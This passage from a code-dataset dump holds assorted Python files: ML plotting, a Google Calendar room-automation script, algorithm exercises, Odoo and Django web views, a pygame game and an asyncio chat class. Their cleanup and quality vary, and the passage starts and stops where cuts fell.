accuracy']['Width']),\n linestyle=(self.lineplottingconfig['Training accuracy']['Style'].lower()),\n marker=(self.lineplottingconfig['Training accuracy']['MarkerStyle']),\n markersize=(self.lineplottingconfig['Training accuracy']['MarkerSize']),\n label='Training accuracy')\n ax1.set_xlim(epochlim)\n ax1.set_ylim(accuracylim)\n else:\n b_line, = ax1.plot((self.learnmat[:, 0]), (self.learnmat[:, 3]), color=(self.lineplottingconfig['Training loss']['Color'].lower()),\n linewidth=(self.lineplottingconfig['Training loss']['Width']),\n linestyle=(self.lineplottingconfig['Training loss']['Style'].lower()),\n marker=(self.lineplottingconfig['Training loss']['MarkerStyle']),\n markersize=(self.lineplottingconfig['Training loss']['MarkerSize']),\n label='Training loss')\n ax1.set_xlim(epochlim)\n ax1.set_ylim(losslim)\n if curvetype == 0:\n b_line, = ax2.plot((self.learnmat[:, 0]), (self.learnmat[:, 3]), color=(self.lineplottingconfig['Training loss']['Color'].lower()),\n linewidth=(self.lineplottingconfig['Training loss']['Width']),\n linestyle=(self.lineplottingconfig['Training loss']['Style'].lower()),\n marker=(self.lineplottingconfig['Training loss']['MarkerStyle']),\n markersize=(self.lineplottingconfig['Training loss']['MarkerSize']),\n label='Training loss')\n ax2.set_xlim(epochlim)\n ax2.set_ylim(losslim)\n if processtype <= 0:\n if curvetype >= 0:\n r_line, = ax1.plot((self.learnmat[:, 0]), (self.learnmat[:, 2]), color=(self.lineplottingconfig['Validation accuracy']['Color'].lower()),\n linewidth=(self.lineplottingconfig['Validation accuracy']['Width']),\n linestyle=(self.lineplottingconfig['Validation accuracy']['Style'].lower()),\n marker=(self.lineplottingconfig['Validation accuracy']['MarkerStyle']),\n markersize=(self.lineplottingconfig['Validation accuracy']['MarkerSize']),\n label='Validation accuracy')\n ax1.set_xlim(epochlim)\n ax1.set_ylim(accuracylim)\n else:\n g_line, = ax1.plot((self.learnmat[:, 0]), (self.learnmat[:, 4]), color=(self.lineplottingconfig['Validation loss']['Color'].lower()),\n linewidth=(self.lineplottingconfig['Validation loss']['Width']),\n linestyle=(self.lineplottingconfig['Validation loss']['Style'].lower()),\n marker=(self.lineplottingconfig['Validation loss']['MarkerStyle']),\n markersize=(self.lineplottingconfig['Validation loss']['MarkerSize']),\n label='Validation loss')\n ax1.set_xlim(epochlim)\n ax1.set_ylim(losslim)\n if curvetype == 0:\n g_line, = ax2.plot((self.learnmat[:, 0]), (self.learnmat[:, 4]), color=(self.lineplottingconfig['Validation loss']['Color'].lower()),\n linewidth=(self.lineplottingconfig['Validation loss']['Width']),\n linestyle=(self.lineplottingconfig['Validation loss']['Style'].lower()),\n marker=(self.lineplottingconfig['Validation loss']['MarkerStyle']),\n markersize=(self.lineplottingconfig['Validation loss']['MarkerSize']),\n label='Validation loss')\n ax2.set_xlim(epochlim)\n ax2.set_ylim(losslim)\n if legendon:\n if processtype == 0:\n if curvetype == 0:\n plt.legend([k_line, r_line, b_line, g_line], [\n 'Training accuracy', 'Validation accuracy', 'Training loss', 'Validation loss'],\n loc='center right')\n if curvetype > 0:\n plt.legend([k_line, r_line], [\n 'Training accuracy', 'Validation accuracy'],\n loc='center right')\n if curvetype < 0:\n plt.legend([b_line, g_line], [\n 'Training loss', 'Validation loss'],\n loc='center right')\n if legendon:\n if processtype > 0:\n if curvetype == 0:\n plt.legend([k_line, b_line], ['Training accuracy', 'Training loss'])\n if curvetype > 0:\n plt.legend([k_line], ['Training accuracy'])\n if curvetype < 0:\n plt.legend([b_line], ['Training loss'])\n if legendon:\n if processtype < 0:\n if curvetype == 0:\n plt.legend([r_line, g_line], ['Validation accuracy', 'Validation loss'])\n if curvetype > 0:\n plt.legend([r_line], ['Validation accuracy'])\n if curvetype < 0:\n plt.legend([g_line], ['Validation loss'])\n fig.canvas.set_window_title('ML Learning Curve')\n plt.show()\n\n\nif __name__ == '__main__':\n import sys\n app = QtWidgets.QApplication(sys.argv)\n PlotMlLearnCurve = QtWidgets.QWidget()\n gui = plotmllearncurve()\n gui.setupGUI(PlotMlLearnCurve)\n PlotMlLearnCurve.show()\n sys.exit(app.exec_())","sub_path":"pycfiles/gaeio-1.0.tar/plotmllearncurve.cpython-36.py","file_name":"plotmllearncurve.cpython-36.py","file_ext":"py","file_size_in_byte":19594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"343596214","text":"from __future__ import print_function\nimport datetime\nimport pickle\nimport os.path\nfrom googleapiclient.discovery import build\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\nimport requests\nimport time\n\nactuator_url=\"http://192.168.1.100:3030\"\nmeeting_room=actuator_url+\"/meeting\"\n\n# If modifying these scopes, delete the file token.pickle.\nSCOPES = ['https://www.googleapis.com/auth/calendar.readonly']\n\ndef main():\n \"\"\"Shows basic usage of the Google Calendar API.\n Prints the start and name of the next 10 events on the user's calendar.\n \"\"\"\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n 'credentials.json', SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n\n service = build('calendar', 'v3', credentials=creds)\n eventName=\" \"\n while True:\n\n # Call the Calendar API\n now = datetime.datetime.utcnow().isoformat() + 'Z' # 'Z' indicates UTC time\n print('Getting the upcoming 10 events')\n events_result = service.events().list(calendarId='6u90hp5dcljnc59u87b7323on0@group.calendar.google.com', timeMin=now,\n singleEvents=True, orderBy='startTime', timeZone='Etc/Zulu',\n maxResults=10).execute()\n events = events_result.get('items', [])\n \n if not events:\n print('No upcoming events found.')\n for event in events:\n startTime = event['start'].get('dateTime')\n endTime = event['end'].get('dateTime')\n if startTime == None:\n print (\"No time for this event\")\n elif startTime < now and endTime > now and eventName != event['summary']: \n print(\"Now\"+now+\" StartTime=\"+startTime+\" EndTime=\"+endTime)\n print(\"Live event\")\n requests.get(meeting_room+\"/projector\"+\"/on\")\n requests.get(meeting_room+\"/blind\"+\"/off\")\n requests.get(meeting_room+\"/light\"+\"/off\")\n eventName=event['summary']\n\n time.sleep(60)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"data_processing/quickstart.py","file_name":"quickstart.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"9523338","text":"# https://leetcode.com/explore/featured/card/30-day-leetcoding-challenge/530/week-3/3301/\n\n\"\"\"\nGiven a string containing only three types of characters: '(', ')' and '*', write a function to check whether this string is valid. We define the validity of a string by these rules:\n\nAny left parenthesis '(' must have a corresponding right parenthesis ')'.\nAny right parenthesis ')' must have a corresponding left parenthesis '('.\nLeft parenthesis '(' must go before the corresponding right parenthesis ')'.\n'*' could be treated as a single right parenthesis ')' or a single left parenthesis '(' or an empty string.\nAn empty string is also valid.\n\nExample 1:\nInput: \"()\"\nOutput: True\nExample 2:\nInput: \"(*)\"\nOutput: True\nExample 3:\nInput: \"(*))\"\nOutput: True\n\nNote:\nThe string size will be in the range [1, 100].\n\n\"\"\"\n\nclass Solution:\n def checkValidString(self, s: str) -> bool:\n min_closing_needed = max_closing_needed = 0\n for char in s:\n if char == \")\":\n max_closing_needed -= 1\n else:\n max_closing_needed += 1 \n \n if char == '(':\n min_closing_needed += 1 \n else:\n min_closing_needed = max(min_closing_needed - 1, 0)\n \n if max_closing_needed < 0: \n return False\n \n return min_closing_needed == 0\n\nsolution = Solution()\n\nexamples = [\n \"()\", # True\n \"(*)\", # True\n \"(*))\", # True\n \"((*))\", # True\n \"((*)\", # True\n \"()(*\", # True\n \"(()\", # False\n \"((*\" # False\n]\n\nfor ex in examples:\n print (\n solution.checkValidString(ex)\n )\n print(\"\")","sub_path":"Leetcode/30-day-challenge/valid_parenthesis_string.py","file_name":"valid_parenthesis_string.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"561733614","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution, third party addon\n# Copyright (C) 2004-2015 Vertel AB ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\nimport base64\n\nimport werkzeug\nimport werkzeug.urls\n\nfrom openerp import http\nfrom openerp.http import request\nfrom openerp.tools.translate import _\n\nimport logging\n_logger = logging.getLogger(__name__)\n\n\nclass ContactUs(http.Controller):\n\n @http.route(['/project_contact_form'], method='POST', auth='public', website=True)\n def send_mail(self, **post):\n subject = \"\"\n body = \"\"\n mail = \"\"\n\n # To make sure the site does not crash while trying to editing theme_dermanord.contactus_response\n if not post.get('case'):\n values = {}\n return request.website.render(\"theme_dermanord.contactus_response\", values)\n\n project_id = int(post.get('case'))\n # ~ _logger.warn('Project_id: %s post: %s' %(project_id, post))\n project = request.env['project.project'].sudo().browse(project_id)\n\n partner = request.env['res.partner'].search([('email', '=', post.get('email_from'))], limit=1)\n if not partner:\n partner = request.env['res.partner'].create({\n 'name':post.get('contact_name'),\n 'email':post.get('email_from'),\n 'phone':post.get('phone')\n })\n\n request.env[project.alias_model].create({\n 'project_id': project.id,\n 'partner_id':partner.id,\n 'name': post.get('name'), \n 'description': post.get('description'),\n 'message_follower_ids':[(4,partner.id)]\n })\n \n values = {}\n return request.website.render(\"theme_dermanord.contactus_response\", values)\n\n\n\n\n\n\n\n\n\n \n","sub_path":"project_contact_form_dermanord/controllers/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"467881796","text":"import pandas as pd\nimport numpy as np\nfrom scipy.stats import pearsonr, spearmanr\nimport statsmodels.api as sm\nimport scipy.stats as stats\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nimport talib\n# note that talib requires that the time series index to be in increasing order\n\n# calculate some technical time series from a price-volume dataframe\n\nclass TAcalc(object):\n def __init__(self):\n self.datetime_index = None\n self.data_dict = {} # numpy array-lized data\n\n def load_data(self,path):\n _data = pd.read_csv(path,index_col='date',parse_dates=['date'])\n self.datetime_index = _data.index\n # numpy array-lize the time series data\n for col_name in ['open','high','low','close','volume']:\n self.data_dict[col_name] = np.array(_data[col_name]).astype(float)\n\n def generate_indicator(self,name):\n if name == 'BBANDS_upper':\n se = talib.BBANDS(self.data_dict['close'])[0]\n elif name == 'BBANDS_middle':\n se = talib.BBANDS(self.data_dict['close'])[1]\n elif name == 'BBANDS_lower':\n se = talib.BBANDS(self.data_dict['close'])[2]\n elif name == 'MA':\n se = talib.MA(self.data_dict['close'], timeperiod=30)\n elif name=='EMA':\n se = talib.EMA(self.data_dict['close'], timeperiod=30)\n elif name=='SMA':\n se = talib.SMA(self.data_dict['close'], timeperiod=30)\n elif name == 'WMA':\n se = talib.WMA(self.data_dict['close'], timeperiod=30)\n\n if name == 'APO':\n se = talib.APO(self.data_dict['close'])\n elif name == 'MACD':\n se = talib.MACD(self.data_dict['close'])[0]\n elif name == 'MOM':\n se = talib.MOM(self.data_dict['close'])\n elif name == 'PPO':\n se = talib.PPO(self.data_dict['close'])\n elif name == 'RSI':\n se = talib.RSI(self.data_dict['close'])\n elif name == 'WILLR':\n se = talib.WILLR(self.data_dict['high'],self.data_dict['low'],self.data_dict['close'])\n\n if name == 'OBV':\n se = talib.OBV(self.data_dict['close'],self.data_dict['volume'])\n\n if name == 'ATR':\n se = talib.ATR(self.data_dict['high'], self.data_dict['low'], self.data_dict['close'], timeperiod=14)\n\n ans = pd.Series(se,index=self.datetime_index)\n ans.name = name\n return ans\n\n# a class that explores the relation between two time series\nclass SeriesExplorer(object):\n def __init__(self,target):\n # import data:\n # target is the target variable (like return, volatility, etc.)\n # indep_vars is a pd.DataFrame with multiple time series as independent variables\n self.target = target.sort_index() # so that the time series is in chronicle order\n self.indep = {}\n self.data = pd.DataFrame(self.target)\n\n def add_indep_vars(self,se_list):\n for se in se_list:\n self.indep[se.name] = se\n\n def sync_index(self):\n # sync the datetime index so that the series share the same index\n # store it to self.data DataFrame\n for key in self.indep.keys():\n self.data[key] = self.indep[key]\n\n def fill_na(self,method='last'):\n # fill NaN's after the index sync step\n # note that the index is in increasing order\n if method == 'last':\n self.data.fillna(method='ffill',inplace=True)\n\n def best_shift_test(self,key,method='pearson',test_range=20,plot=False):\n # test which shift series of key column has best correlation with the target variable\n _indep = self.data[key]\n _tar = self.data[self.target.name]\n _corr_list = []\n for d in range(test_range):\n _se = _indep.shift(d)\n nas = np.logical_or(_se.isnull(), _tar.isnull())\n if method == 'pearson':\n ans = pearsonr(_tar[~nas],_se[~nas])[0]\n elif method == 'spearman':\n ans = spearmanr(_tar[~nas],_se[~nas])[0]\n _corr_list.append(ans)\n\n # if plot=True, plot the corr. vs diff scatter\n if plot:\n _ = plt.plot(_corr_list)\n maxarg = np.argmax(abs(np.array(_corr_list)))\n plt.title('{2} max={0} at d={1}'.format(_corr_list[maxarg],maxarg,key))\n plt.show()\n\n return _corr_list\n\n def target_dist(self,bins=10,dist=stats.norm):\n # plot the distribution histogram of the target variable\n _ = self.target.hist(bins=bins)\n plt.show()\n\n # plot the qq plot\n _ = sm.qqplot(self.target,dist,fit=True,line='45')#,stats.beta\n plt.show()\n\n def correlation_matrix(self):\n # plot the heatmap of correlations between independent variables\n _l = [c for c in self.indep.keys()]\n _l.sort()\n _corr = self.data[_l].corr()\n g = sns.heatmap(_corr, xticklabels=_corr.columns, yticklabels=_corr.columns)\n g.set_xticklabels(g.get_xticklabels(), rotation=90)\n g.set_yticklabels(g.get_yticklabels(), rotation=0)\n plt.show()\n\n\ndef shift_series(se,diff):\n # shift a time series diff days towards future direction\n ans = se.shift(diff)\n ans.name = '{0}_{1}'.format(se.name,diff)\n return ans\n\n\nif __name__=='__main__':\n # read sugar future SR701 data and generate return series\n df = pd.read_csv('../data/SR701.csv',index_col='date',parse_dates=['date'])\n hold_day = 10\n # note that SR701 data is reverse chronically ordered\n df['rtn'] = np.log(df['close'].shift(hold_day + 1) / df['close'].shift(1))\n rtn_series = df['rtn'].dropna()\n rtn_series.name = 'rtn'\n print(rtn_series)\n close_series = df['close'].shift(1).dropna()\n close_series.name = 'close'\n series_exp = SeriesExplorer(rtn_series)\n #series_exp = SeriesExplorer(close_series)\n\n # make potential independent variable series\n ta_name_list = ['BBANDS_upper','BBANDS_middle','BBANDS_lower','MA','EMA','SMA','WMA','APO','MACD','MOM','PPO','RSI','WILLR','OBV','ATR']\n ta = TAcalc()\n ta.load_data('../data/CZZ.csv')\n\n ta_se_list = []\n for ta_name in ta_name_list:\n se = ta.generate_indicator(ta_name)\n ta_se_list.append(se)\n #print(se)\n\n series_exp.add_indep_vars(ta_se_list)\n series_exp.sync_index()\n series_exp.fill_na()\n #print(series_exp.indep[se.name])\n #print(series_exp.data.head())\n\n #for ta_name in ta_name_list:\n # series_exp.best_shift_test(key=ta_name,method='spearman',plot=True)\n\n series_exp.target_dist(bins=15)\n\n #series_exp.correlation_matrix()","sub_path":"src/taseries.py","file_name":"taseries.py","file_ext":"py","file_size_in_byte":6582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"16595876","text":"import pygame\nimport random\n\nSCREEN_WIDTH = 600\nSCREEN_HEIGHT = 400\n\npygame.init()\nscreen = pygame.display.set_mode([SCREEN_WIDTH, SCREEN_HEIGHT]) # 初始化窗口\npygame.display.set_caption('wxz & Hot dog war') # 设置窗口标题\n\n# 载入背景图\nbackground = pygame.transform.scale(pygame.image.load('./resources/image/1.png'), (1800, 400))\ngame_over_img = pygame.transform.scale(pygame.image.load('./resources/image/game_over.jpg'), (600, 400))\n# 载入王思聪\nwsc_img = pygame.transform.scale(pygame.image.load('./resources/image/wsc.png'), (50, 50))\n# 载入热狗\nhot_dog_img = pygame.transform.scale(pygame.image.load('./resources/image/hot_dog.png'), (30, 30))\n\n# 定义王思聪起始位置\nwsc_x = 20\nwsc_y = 200\nwsc_pos = [wsc_x, wsc_y]\n\n# 定义热狗位置\nhot_dog_y = 200\nhot_dog_x = 550\nhot_dog_pos = [hot_dog_x, hot_dog_y]\n\n# 定义背景图位置\nbg_h = 0\nbg_w = 0\nbg_pos = [bg_h, bg_w]\ngame_over_pos = [600, 0]\n\n# 定义跳跃\njump = False\njump_h = 10\n\n# 定义开始 等级 结束\nstart = False\nend = False\nlevel = 5\nscore = 0\n\n# 得分\nfont = pygame.font.SysFont('arial', 36, True)\n\nwhile True:\n\n # 加载背景图\n screen.blit(background, bg_pos)\n screen.blit(font.render('%d' % score, True, [255, 0, 0]), [60, 20])\n screen.blit(hot_dog_img, (20, 16))\n\n # 加载王思聪\n screen.blit(wsc_img, wsc_pos)\n\n # 加载热狗\n screen.blit(hot_dog_img, hot_dog_pos)\n\n # 处理游戏退出\n # 从消息队列中循环取\n for event in pygame.event.get():\n\n if event.type == pygame.QUIT:\n pygame.quit()\n exit()\n\n # 控制\n if event.type == pygame.KEYDOWN:\n\n if event.key == pygame.K_SPACE:\n if start:\n jump = True\n else:\n start = True\n\n # 退出事件\n if event.key == pygame.K_ESCAPE:\n pygame.quit()\n exit()\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_SPACE:\n jump = False\n\n if start:\n\n # 同步热狗\n hot_dog_x -= 1 * level\n hot_dog_pos = [hot_dog_x, hot_dog_y]\n if hot_dog_x <= 0:\n hot_dog_x = 600\n hot_dog_y = random.randint(5, 355)\n\n # 背景循环\n bg_h -= 1 * level\n bg_pos = [bg_h, bg_w]\n if bg_h <= -1200:\n bg_h = 0\n level += 1\n\n # 跳跃\n if jump:\n wsc_y -= 5\n wsc_pos = [wsc_x, wsc_y]\n else:\n if wsc_y < 400:\n wsc_y += 4\n wsc_pos = [wsc_x, wsc_y]\n\n # 结束验证\n if wsc_y > 380 or wsc_y < 0:\n game_over_pos = [0, 0]\n start = False\n end = True\n\n # 验证热狗和王思聪\n\n if hot_dog_x > wsc_x and hot_dog_x < wsc_x + 50:\n if hot_dog_y > wsc_y and hot_dog_y < wsc_y + 50:\n score += 1\n hot_dog_x = 600\n hot_dog_y = random.randint(5, 355)\n screen.blit(font.render('%d' % score, True, [255, 0, 0]), [60, 20])\n\n # 结束\n if end:\n screen.blit(game_over_img, game_over_pos)\n\n # 更新窗口\n pygame.display.update()\n","sub_path":"py_game.py","file_name":"py_game.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"2892449","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\ndef showList(node):\n while node:\n print(node.val)\n node = node.next\n\nclass Solution:\n def reverseList(self, head: ListNode) -> ListNode:\n prevHead = None\n while head:\n nextNode = head.next\n head.next = prevHead\n prevHead = head\n head = nextNode\n return prevHead\n\n def reverseList2(self, head: ListNode) -> ListNode:\n if not head or not head.next:\n return head\n last = self.reverseList2(head.next)\n head.next.next = head\n head.next = None\n return last\n \n \nn1 = ListNode(1)\nn2 = ListNode(2)\nn3 = ListNode(3)\nn4 = ListNode(4)\nn5 = ListNode(5)\nn1.next = n2\nn2.next = n3\nn3.next = n4\nn4.next = n5\nx = Solution()\nres = x.reverseList2(n1)\nshowList(res)\n","sub_path":"leetcode206.py","file_name":"leetcode206.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"152245421","text":"import csv\nfrom datetime import datetime\nfrom elasticsearch import Elasticsearch\n\nstocksFileName = 'PMAnalysis_with_Live_EOD.csv'\n\ntry:\n es = Elasticsearch([{'host': 'localhost', 'port': 9200}])\n\n # initializing the titles and rows list\n fields = []\n rows = []\n\n # reading csv file\n with open(stocksFileName, 'r') as csvfile:\n # creating a csv reader object\n csvreader = csv.reader(csvfile)\n\n # extracting field names through first row\n fields = next(csvreader)\n\n # extracting each data row one by one\n for row in csvreader:\n doc = {}\n col_counter = 0;\n for col in row:\n if (fields[col_counter] != ''):\n doc[fields[col_counter]] = col;\n col_counter += 1\n doc['executionDate'] = datetime.now()\n try:\n res = es.index(index=\"pm_analysis_data\", body=doc)\n except:\n print('Error inserting doc')\n print(doc)\nexcept:\n print('error')\n","sub_path":"pm_analysis_data.py","file_name":"pm_analysis_data.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"309620632","text":"from puzzle_gym.envs.puzzle_env import PuzzleEnv\r\n\r\nenv = PuzzleEnv(images=None,\r\n img_size=(36, 36),channel_num=1, puzzle_size=(3, 3), puzzle_type=\"switch\", dist_type=\"manhattan\", penalty_for_step=-0.15,\r\n reward_for_completiton=20, positive_reward_coefficient=1.0, render_mode=\"human\")\r\n\r\nenv.render()\r\ndone = False\r\nwhile not done:\r\n n = int(input(\"Enter n: \"))\r\n _, rew, done, ___ = env.step(n)\r\n print(rew)\r\n","sub_path":"poc.py","file_name":"poc.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"178991681","text":"import math\nn = int(input())\n\ndef nad(n, k):\n '''\n vrne rezultat n nad k\n '''\n if k < 0 or k > n or n < 0:\n return 0\n return math.factorial(n) / (math.factorial(n - k) * math.factorial(k))\n\n\ndef rešitev(n):\n '''\n vrne koliko % možnosti je da se izide\n '''\n slo = dict()\n k = 2\n while k <= n:\n # vmesh možnih je (k - 1)^k\n vmes = (k - 1) ** k\n vsota = 0\n prišrevek = 2\n while prišrevek < k:\n # koliko jih je treba odstraniti\n vmes_vsota = slo[prišrevek]\n vmes_vsota *= nad(k - 1, prišrevek - 1)\n vmes_vsota *= (k - prišrevek - 1) ** (k - prišrevek)\n vsota += vmes_vsota\n prišrevek += 1\n slo[k] = vmes - vsota\n k += 1\n vse_mozno = (n - 1) ** n\n reš = slo[n] / vse_mozno\n return reš\nprint('{0:.12f}'.format(rešitev(n)))","sub_path":"Kattis/absurdistan2.py","file_name":"absurdistan2.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"86813936","text":"# -*- encoding: utf-8 -*-\nfrom django.conf import settings\nfrom django.views.generic import CreateView, UpdateView, ListView, DetailView\nfrom .models import Empleado\nfrom .forms import EmpleadoModelForm, EmpleadoUsuarioForm\nfrom django.core.urlresolvers import reverse_lazy\nfrom rest_framework import viewsets\nfrom django.db.models import Q\nimport socket\nfrom pure_pagination.mixins import PaginationMixin\nfrom django.template.defaultfilters import slugify\n\nfrom infos_sistemas.mixins import TipoPerfilUsuarioMixin\n\nclass EmpleadoCreateView(TipoPerfilUsuarioMixin, CreateView):\n template_name = 'empleado_create.html'\n form_class \t = EmpleadoUsuarioForm\n model = Empleado\n success_url = reverse_lazy('empleado:control')\n\n def form_valid(self, form):\n user = form['model_form_usuario'].save(commit=False)\n user.usuario_creador = self.request.user\n user.ultimo_usuario_editor = user.usuario_creador\n try:\n user.nombre_host = socket.gethostname()\n user.ultimo_nombre_host = user.nombre_host\n except:\n user.nombre_host = 'localhost'\n user.ultimo_nombre_host = user.nombre_host\n user.direccion_ip = socket.gethostbyname(socket.gethostname())\n user.ultimo_direccion_ip = socket.gethostbyname(socket.gethostname())\n\n\n empleado = form['model_form_empleado'].save(commit=False)\n empleado.tipo_persona = 'Natural'\n if empleado.numero_hijo is None:\n empleado.numero_hijo = 0\n\n user.save()\n\n empleado.usuario = user\n empleado.usuario_creador = self.request.user\n empleado.ultimo_usuario_editor = empleado.usuario_creador\n try:\n empleado.nombre_host = socket.gethostname()\n empleado.ultimo_nombre_host = empleado.nombre_host\n except:\n empleado.nombre_host = 'localhost'\n empleado.ultimo_nombre_host = empleado.nombre_host\n empleado.direccion_ip = socket.gethostbyname(socket.gethostname())\n empleado.ultimo_direccion_ip = socket.gethostbyname(socket.gethostname())\n\n empleado.save()\n\n return super(EmpleadoCreateView, self).form_valid(form)\n\n\nclass EmpleadoUpdate(TipoPerfilUsuarioMixin, UpdateView):\n form_class = EmpleadoModelForm\n success_url = reverse_lazy('empleado:control')\n template_name = 'empleado_update.html'\n queryset = Empleado.objects.all()\n\n\n def form_valid(self, form):\n self.object = form.save(commit=False)\n if self.object.numero_hijo is None:\n self.object.numero_hijo = 0\n self.object.ultimo_usuario_editor = self.request.user\n try:\n self.object.ultimo_nombre_host = socket.gethostname()\n except:\n self.object.ultimo_nombre_host = 'localhost'\n\n self.object.ultimo_direccion_ip = socket.gethostbyname(socket.gethostname())\n self.object.save()\n\n return super(EmpleadoUpdate, self).form_valid(form)\n\nclass EmpleadoUsuarioUpdateView(TipoPerfilUsuarioMixin, UpdateView):\n form_class = EmpleadoUsuarioForm\n success_url = reverse_lazy('empleado:control')\n template_name = 'empleado_usuario_update.html'\n queryset = Empleado.objects.all()\n\n def get_context_data(self, **kwarg):\n context = super(EmpleadoUpdateView, self).get_context_data(**kwarg)\n empleado = self.queryset.get(slug__contains=self.kwargs['slug'])\n data = {'empleado':empleado}\n context.update(data)\n return context\n\n def get_form_kwargs(self):\n kwargs = super(EmpleadoUpdateView, self).get_form_kwargs()\n kwargs.update(instance={\n 'model_form_empleado': self.object,\n 'model_form_usuario': self.object.usuario,\n })\n return kwargs\n\n def form_valid(self, form):\n empleado = self.queryset.get(slug__contains=self.kwargs['slug'])\n user = form['model_form_usuario'].save(commit=False)\n user = empleado.usuario\n user.ultimo_usuario_editor = self.request.user\n try:\n user.ultimo_nombre_host = user.nombre_host\n except:\n user.ultimo_nombre_host = user.nombre_host\n user.ultimo_direccion_ip = socket.gethostbyname(socket.gethostname())\n\n empleado = form['model_form_empleado'].save(commit=False)\n empleado.tipo_persona = 'Natural'\n if empleado.numero_hijo is None:\n empleado.numero_hijo = 0\n user.save()\n\n empleado.usuario = user\n empleado.ultimo_usuario_editor = self.request.user\n try:\n empleado.ultimo_nombre_host = empleado.nombre_host\n except:\n empleado.ultimo_nombre_host = empleado.nombre_host\n empleado.ultimo_direccion_ip = socket.gethostbyname(socket.gethostname())\n empleado.save()\n return super(EmpleadoUpdateView, self).form_valid(form)\n\n\nclass EmpleadoDetailView(TipoPerfilUsuarioMixin, DetailView):\n template_name = 'empleado_detail.html'\n model = Empleado\n queryset = Empleado.objects.all()\n\n\nclass EmpleadoControlListView(PaginationMixin, TipoPerfilUsuarioMixin, ListView):\n model = Empleado\n template_name = 'empleados.html'\n paginate_by = 10\n\n def get_context_data(self, **kwarg):\n context = super(EmpleadoControlListView, self).get_context_data(**kwarg)\n boton_menu = False\n total_registro = self.model.objects.count()\n\n data = {\n 'boton_menu' : boton_menu,\n 'total_registro': total_registro,\n }\n\n context.update(data)\n return context\n\n def get(self, request, *args, **kwargs):\n if request.GET.get('search_registro', None):\n self.object_list = self.get_queryset()\n context = self.get_context_data()\n return self.render_to_response(context)\n else:\n return super(EmpleadoControlListView, self).get(self, request, *args, **kwargs)\n\n def get_queryset(self):\n if self.request.GET.get('search_registro', None):\n value = self.request.GET.get('search_registro', None)\n queryset = self.model.objects.filter(Q(slug__icontains=slugify(value)))\n else:\n queryset = super(EmpleadoControlListView, self).get_queryset()\n return queryset\n","sub_path":"empleados/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"64126567","text":"import asyncio\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s-[%(levelname)s]-[%(funcName)s:%(lineno)d]:%(message)s',\n datefmt='%Y/%m/%d,%H:%M:%S')\n\n\n# 定义结束异常类\nclass EndSession(Exception):\n pass\n\n'''\n异步通信基类\n'''\nclass AbstractAsyncioBase():\n def __init__(self, reader, writer, loop):\n logging.debug('%s:=======start========' %('AbstractAsyncioBase'))\n self._reader = reader\n self._writer = writer\n self._loop = loop\n asyncio.run_coroutine_threadsafe(self.on_read(), loop)\n\n async def on_read(self):\n logging.debug('%s:=======start========' %('on_read'))\n while True:\n logging.debug(\"reading......\")\n line = await self._reader.read(1000)\n if not line:\n print (\"[on_read]connection exit.\\n\")\n break\n\n print('[on_read]Recieve:%s' %(line.decode('utf-8').rstrip()))\n\n logging.debug('%s:*******end*******' %('on_read'))\n\nclass AsyncioChat(AbstractAsyncioBase):\n ac_in_buffer_size = 65536\n # we don't want to enable the use of encoding by default, because that is a\n # sign of an application bug that we don't want to pass silently\n\n use_encoding = 0\n encoding = 'latin-1'\n\n def __init__(self, reader, writer, loop):\n AbstractAsyncioBase.__init__(self, reader, writer, loop)\n # for string terminator matching\n self.ac_in_buffer = b''\n\n async def on_read(self):\n logging.debug('%s:=======start========' %('AsyncioChat.on_read'))\n while True:\n logging.debug(\"reading......\")\n line = await self._reader.read(self.ac_in_buffer_size)\n if not line:\n print (\"[on_read]connection 